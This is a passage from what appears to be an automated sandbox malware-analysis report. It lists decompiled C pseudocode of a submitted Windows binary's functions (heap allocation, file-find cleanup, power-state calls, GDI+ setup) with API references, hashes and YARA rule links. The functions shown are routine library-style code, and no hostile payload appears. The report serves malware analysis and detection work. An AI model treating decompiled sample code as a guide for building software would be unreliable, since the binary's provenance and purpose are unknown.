				void* __ebx;
				intOrPtr _t18;
				char _t19;
				char _t20;
				void* _t23;
				void* _t24;
				void* _t26;
				void* _t37;
				void* _t43;
				intOrPtr _t45;

				_t26 = __ecx;
				E00BBE0E4(E00BD1EA8, _t43);
				_push(_t26);
				E00BBE1C0();
				_push(_t24);
				 *((intOrPtr*)(_t43 - 0x10)) = _t45;
				E00BC5646(0xbf386a, "X");
				E00BAFDED(0xbf588c, _t37, 0xbd25b0);
				E00BC5646(0xbf488a,  *((intOrPtr*)(_t43 + 0xc)));
				E00BA5C29(0xbeb578, _t37,  *((intOrPtr*)(_t43 + 0xc)));
				_t4 = _t43 - 4;
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t18 = 2;
				 *0xbf2848 = _t18;
				 *0xbf2844 = _t18;
				 *0xbf2840 = _t18;
				_t19 =  *0xbe7444; // 0x0
				 *0xbf16cb = _t19;
				_t20 =  *0xbe7445; // 0x0
				 *0xbf1704 = 1;
				 *0xbf1707 = 1;
				 *0xbf16cc = _t20; // executed
				E00BA7C41(_t43 - 0x2108, _t37,  *_t4, 0xbeb578); // executed
				 *(_t43 - 4) = 1;
				E00BA7DB8(_t43 - 0x2108, _t37,  *_t4);
				_t23 = E00BA7CD4(_t24, _t43 - 0x2108, _t37); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t23;
			}

0x00bbcf72
0x00bbcf77
0x00bbcf7c
0x00bbcf82
0x00bbcf87
0x00bbcf8a
0x00bbcf97
0x00bbcfa8
0x00bbcfb5
0x00bbcfc6
0x00bbcfcb
0x00bbcfcb
0x00bbcfd7
0x00bbcfd8
0x00bbcfdd
0x00bbcfe2
0x00bbcfe7
0x00bbcfec
0x00bbcff1
0x00bbcff7
0x00bbcffe
0x00bbd005
0x00bbd00a
0x00bbd015
0x00bbd019
0x00bbd024
0x00bbd02e
0x00bbd039

APIs

__EH_prolog.LIBCMT ref: 00BBCF77

Part of subcall function 00BA7C41: __EH_prolog.LIBCMT ref: 00BA7C46
Part of subcall function 00BA7C41: new.LIBCMT ref: 00BA7C8B

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cc9a6f2238d168d43c9c1e92e0671e7b4ab9648013c8e31eb796fc6922526145
Instruction ID: 99a85ad12f6db5f1fc754e1947d76a5e866672e5e582fe3ec5b1c47411d90727
Opcode Fuzzy Hash: cc9a6f2238d168d43c9c1e92e0671e7b4ab9648013c8e31eb796fc6922526145
Instruction Fuzzy Hash: BD11E27694C284AFC714EB5CEC12BE87BE4DB25310F0044EAF544973A2EFB11A84C761

Uniqueness

Uniqueness Score: -1.00%

Function 00BCBA59 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00BCBA59(void* __edx, void* __esi, void* __eflags) {
				intOrPtr _v12;
				void* __ecx;
				char _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t31;
				char _t32;
				void* _t34;
				intOrPtr* _t36;

				_push(_t26);
				_push(_t26);
				_t16 = E00BC8429(_t26, 0x40, 0x30); // executed
				_t32 = _t16;
				_v12 = _t32;
				_t28 = _t31;
				if(_t32 != 0) {
					_t2 = _t32 + 0xc00; // 0xc00
					_t17 = _t2;
					__eflags = _t32 - _t17;
					if(__eflags != 0) {
						_t3 = _t32 + 0x20; // 0x20
						_t36 = _t3;
						_t34 = _t17;
						do {
							_t4 = _t36 - 0x20; // 0x0
							E00BCA54A(_t28, _t36, __eflags, _t4, 0xfa0, 0);
							 *(_t36 - 8) =  *(_t36 - 8) | 0xffffffff;
							 *_t36 = 0;
							_t36 = _t36 + 0x30;
							 *((intOrPtr*)(_t36 - 0x2c)) = 0;
							 *((intOrPtr*)(_t36 - 0x28)) = 0xa0a0000;
							 *((char*)(_t36 - 0x24)) = 0xa;
							 *(_t36 - 0x23) =  *(_t36 - 0x23) & 0x000000f8;
							 *((char*)(_t36 - 0x22)) = 0;
							__eflags = _t36 - 0x20 - _t34;
						} while (__eflags != 0);
						_t32 = _v12;
					}
				} else {
					_t32 = 0;
				}
				E00BC835E(0);
				return _t32;
			}

0x00bcba5e
0x00bcba5f
0x00bcba66
0x00bcba6b
0x00bcba6f
0x00bcba73
0x00bcba76
0x00bcba7c
0x00bcba7c
0x00bcba82
0x00bcba84
0x00bcba87
0x00bcba87
0x00bcba8a
0x00bcba8c
0x00bcba92
0x00bcba96
0x00bcba9b
0x00bcba9f
0x00bcbaa1
0x00bcbaa4
0x00bcbaaa
0x00bcbab1
0x00bcbab5
0x00bcbab9
0x00bcbabc
0x00bcbabc
0x00bcbac0
0x00bcbac3
0x00bcba78
0x00bcba78
0x00bcba78
0x00bcbac5
0x00bcbad2

APIs

Part of subcall function 00BC8429: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BC8E53,00000001,00000364,?,00BC36CF,?,?,00BDFF50), ref: 00BC846A

_free.LIBCMT ref: 00BCBAC5

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 2e53147deb3311add6a8c781c2b4018419980c47001a732f98a580871976bfe2
Instruction ID: f55539e69ff29fdd7c2e32a60402d78a8a1e7e752c142ca063ed0c85e0613bd9
Opcode Fuzzy Hash: 2e53147deb3311add6a8c781c2b4018419980c47001a732f98a580871976bfe2
Instruction Fuzzy Hash: 2201D672204345ABE3218E69D882E5EFBD9EB85370F29055DF5D4932C0EF31A8058778

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA9C8 Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00BAA9C8(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* __esi;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t16;
				intOrPtr* _t22;

				_push(__ecx);
				_t22 = __ecx;
				_t24 =  *((intOrPtr*)(__ecx + 8));
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					_t15 = E00BBE0A0(__edx, __ecx, _t24, 0xb54); // executed
					_v8 = _t15;
					_t25 = _t15;
					if(_t15 == 0) {
						_t16 = 0;
						__eflags = 0;
					} else {
						_t16 = E00BAA821(_t15, _t25);
					}
					 *((intOrPtr*)(_t22 + 8)) = _t16;
				}
				_t12 = _a4;
				 *_t22 = _t12;
				if(_t12 == 1) {
					 *(_t22 + 4) =  *(_t22 + 4) & 0x00000000;
				}
				if(_t12 == 2) {
					 *(_t22 + 4) =  *(_t22 + 4) | 0xffffffff;
				}
				if(_t12 == 3) {
					E00BA599B( *((intOrPtr*)(_t22 + 8)));
				}
				_t13 = _a8;
				if(_t13 >= 8) {
					_t13 = 8;
				}
				 *((intOrPtr*)(_t22 + 0x10)) = _t13;
				return _t13;
			}

0x00baa9cb
0x00baa9cd
0x00baa9cf
0x00baa9d3
0x00baa9da
0x00baa9df
0x00baa9e3
0x00baa9e5
0x00baa9f0
0x00baa9f0
0x00baa9e7
0x00baa9e9
0x00baa9e9
0x00baa9f2
0x00baa9f2
0x00baa9f5
0x00baa9f8
0x00baa9fd
0x00baa9ff
0x00baa9ff
0x00baaa06
0x00baaa08
0x00baaa08
0x00baaa0f
0x00baaa14
0x00baaa14
0x00baaa19
0x00baaa1f
0x00baaa23
0x00baaa23
0x00baaa24
0x00baaa2b

APIs

new.LIBCMT ref: 00BAA9DA

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89a9fac127979345a50c86b2f1aa3e1a3157f1ba5fcf38bfa699f3ae12b8a270
Instruction ID: 3dd0ee73f3372d265f17b6819d7533d63a02d2ee119ca3f0cd54cc43e13509a3
Opcode Fuzzy Hash: 89a9fac127979345a50c86b2f1aa3e1a3157f1ba5fcf38bfa699f3ae12b8a270
Instruction Fuzzy Hash: 1BF0A4315187059FDB30DE64C94575A77D4EB03320F208A9EE495C7190D770D884C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00BC8429 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00BC8429(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t16;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xc006e4, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00BC8214();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00BC87DA())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00BC6FF2(_t15, _t16, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t16 = _t13 % _t18;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00bc8429
0x00bc842f
0x00bc8434
0x00bc8442
0x00bc8442
0x00bc8448
0x00bc844a
0x00bc844a
0x00bc8461
0x00bc846a
0x00bc8472
0x00000000
0x00000000
0x00bc8452
0x00bc8454
0x00bc8476
0x00bc847b
0x00bc8481
0x00000000
0x00bc8481
0x00bc8457
0x00bc845c
0x00bc845d
0x00bc845f
0x00000000
0x00000000
0x00bc845f
0x00000000
0x00bc8461
0x00bc843a
0x00bc843b
0x00bc8440
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BC8E53,00000001,00000364,?,00BC36CF,?,?,00BDFF50), ref: 00BC846A

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: dcd11e898005f9846e7a3e62b430d936feb0e97eb50e7f26be187965a93b3a9f
Instruction ID: 9960bd837953cbdcd6c07240ed295d9f1f611d61a4c1249bf1915d3d09daf0e9
Opcode Fuzzy Hash: dcd11e898005f9846e7a3e62b430d936feb0e97eb50e7f26be187965a93b3a9f
Instruction Fuzzy Hash: A0F0B431605636ABDB291F659C05F5B77CADB80760B15C1AEF808E6280CE20DC0186A1

Uniqueness

Uniqueness Score: -1.00%

Function 00BA5BA7 Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00BA5BA7(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t25;
				intOrPtr _t34;
				void* _t36;

				_t25 = __ecx;
				E00BBE0E4(E00BD1BAE, _t36);
				_push(_t25);
				_t34 = _t25;
				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
				E00BAAFBD(_t25); // executed
				_t2 = _t36 - 4;
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E00BAFDCB();
				 *(_t36 - 4) = 1;
				E00BAFDCB();
				 *(_t36 - 4) = 2;
				E00BAFDCB();
				 *(_t36 - 4) = 3;
				E00BAFDCB();
				 *(_t36 - 4) = 4;
				E00BAFDCB();
				 *(_t36 - 4) = 5;
				E00BA5D9C(_t34,  *_t2);
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}

0x00ba5ba7
0x00ba5bac
0x00ba5bb1
0x00ba5bb3
0x00ba5bb5
0x00ba5bb8
0x00ba5bbd
0x00ba5bbd
0x00ba5bc7
0x00ba5bd2
0x00ba5bd6
0x00ba5be1
0x00ba5be5
0x00ba5bf0
0x00ba5bf4
0x00ba5bff
0x00ba5c03
0x00ba5c0a
0x00ba5c0e
0x00ba5c19
0x00ba5c23

APIs

__EH_prolog.LIBCMT ref: 00BA5BAC

Part of subcall function 00BAAFBD: __EH_prolog.LIBCMT ref: 00BAAFC2

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: abba789bd8de98ad1fe31861115a36e6952df82aa77a95c22021835d4f3376b7
Instruction ID: d31fab8a65811c42d099b7a4967cb94c0532377fd802e7f69ff498cc8f3943d2
Opcode Fuzzy Hash: abba789bd8de98ad1fe31861115a36e6952df82aa77a95c22021835d4f3376b7
Instruction Fuzzy Hash: 5A018130A09644DAD716E7F8C1057EDB7E49F1A305F4044EEA49A53282DBB81B05C763

Uniqueness

Uniqueness Score: -1.00%

Function 00BC8398 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00BC8398(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00BC87DA())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xc006e4, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00BC8214();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00BC6FF2(_t7, _t8, _t9, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00bc8398
0x00bc839e
0x00bc83a4
0x00bc83d6
0x00bc83db
0x00bc83e1
0x00000000
0x00bc83e1
0x00bc83a8
0x00bc83aa
0x00bc83aa
0x00bc83c1
0x00bc83ca
0x00bc83d2
0x00000000
0x00000000
0x00bc83b2
0x00bc83b4
0x00000000
0x00000000
0x00bc83b7
0x00bc83bc
0x00bc83bd
0x00bc83bf
0x00000000
0x00000000
0x00bc83bf
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC3866,?,0000015D,?,?,?,?,00BC4D42,000000FF,00000000,?,?), ref: 00BC83CA

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6d5f9adcc2a75465df3ddccf064c1d316f6ad0d1a7989c58aab2bb52c89a701a
Instruction ID: 79f7edbe52c090286839a96006e394a5d3c8af47be366c434a7d14e8ea20d1f7
Opcode Fuzzy Hash: 6d5f9adcc2a75465df3ddccf064c1d316f6ad0d1a7989c58aab2bb52c89a701a
Instruction Fuzzy Hash: 2EE0E5312012A196DA312B669C05F5F76CAEFC1FA0F1521AAFC54A6480EF60CC0081E9

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9670 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00BA9670(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 4) != 0xffffffff) {
					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
				}
				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x14)) != _t16) {
					E00BA6DD3(0xbdff50, _t21 + 0x1e);
				}
				return _t16;
			}

0x00ba9672
0x00ba9674
0x00ba967a
0x00ba9680
0x00ba9691
0x00ba9696
0x00ba9698
0x00ba9698
0x00ba969a
0x00ba969a
0x00ba969e
0x00ba96a4
0x00ba96b4
0x00ba96b4
0x00ba96bd

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00BA9624), ref: 00BA968B

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 0a54b0130183c141f2a5658a0bda6c9a4ee50116fa4624089956fef6223eb44a
Instruction ID: a3d69bafd6f7b7dc817c12e19f7faddcd1b00aec926d0c48158f4b00c27c2af3
Opcode Fuzzy Hash: 0a54b0130183c141f2a5658a0bda6c9a4ee50116fa4624089956fef6223eb44a
Instruction Fuzzy Hash: A0F05E7048AB158EDB308B28C958796B7E4DF13725F088BAED0F6479E0A761684DEB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA406 Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BAA406(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _t12;
				intOrPtr _t20;

				_t20 = _a8;
				 *((char*)(_t20 + 0x1044)) = 0;
				if(E00BAB865(_a4) == 0) {
					_t12 = E00BAA534(__edx, 0xffffffff, _a4, _t20);
					if(_t12 == 0xffffffff) {
						goto L1;
					}
					FindClose(_t12); // executed
					 *(_t20 + 0x1040) =  *(_t20 + 0x1040) & 0x00000000;
					 *((char*)(_t20 + 0x100c)) = E00BAA122( *((intOrPtr*)(_t20 + 0x1008)));
					 *((char*)(_t20 + 0x100d)) = E00BAA13A( *((intOrPtr*)(_t20 + 0x1008)));
					return 1;
				}
				L1:
				return 0;
			}

0x00baa407
0x00baa40f
0x00baa41d
0x00baa42a
0x00baa432
0x00000000
0x00000000
0x00baa435
0x00baa441
0x00baa453
0x00baa45e
0x00000000
0x00baa464
0x00baa41f
0x00000000

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BAA435

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 083d7463825f4fcf108ea1325ef82b1c7c62f7b09dd8a2b6c5e4c88587e10b19
Instruction ID: d54949e2d93c3a903e1135aed47b0b3756458ed9fa793ea14e8035087e16e032
Opcode Fuzzy Hash: 083d7463825f4fcf108ea1325ef82b1c7c62f7b09dd8a2b6c5e4c88587e10b19
Instruction Fuzzy Hash: A8F0B43100D380AACA222B7448047C6BBE5AF1B321F04CA89F1F912192C7B95089C733

Uniqueness

Uniqueness Score: -1.00%

Function 00BB05DA Relevance: 1.5, APIs: 1, Instructions: 21
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00BB05DA() {
				void* __esi;
				void* _t2;

				L00BB12A7(); // executed
				_t2 = E00BB12AC();
				if(_t2 != 0) {
					_t2 = E00BA6E21(_t2, 0xbdff50, 0xff, 0xff);
				}
				if( *0xbdff5b != 0) {
					_t2 = E00BA6E21(_t2, 0xbdff50, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}

0x00bb05dc
0x00bb05e1
0x00bb05f2
0x00bb05f7
0x00bb05f7
0x00bb0603
0x00bb0608
0x00bb0608
0x00bb060f
0x00bb0617

APIs

SetThreadExecutionState.KERNEL32 ref: 00BB060F

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 192728cba4cb64a975a7ff34d9072d24e9865e631ac7d99b4d7e5ac005cfa2dd
Instruction ID: fd2a72d09406bf32efd24dbf896ebeea598bbb156448a7fb8c04043fb9e94932
Opcode Fuzzy Hash: 192728cba4cb64a975a7ff34d9072d24e9865e631ac7d99b4d7e5ac005cfa2dd
Instruction Fuzzy Hash: 25D01215A6A05217DA113368A8557FE1FC68FC7310F0C00F6B50A97392DE850946D2A1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9D2F Relevance: 1.5, APIs: 1, Instructions: 17
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00BB9D2F(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L00BBE06A();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E00BB9A7F(__eax, _a4, _a8); // executed
				return _t6;
			}

0x00bb9d32
0x00bb9d33
0x00bb9d35
0x00bb9d3a
0x00bb9d3f
0x00000000
0x00bb9d50
0x00bb9d49
0x00000000

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00BB9D35

Part of subcall function 00BB9A7F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00BB9AA0

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
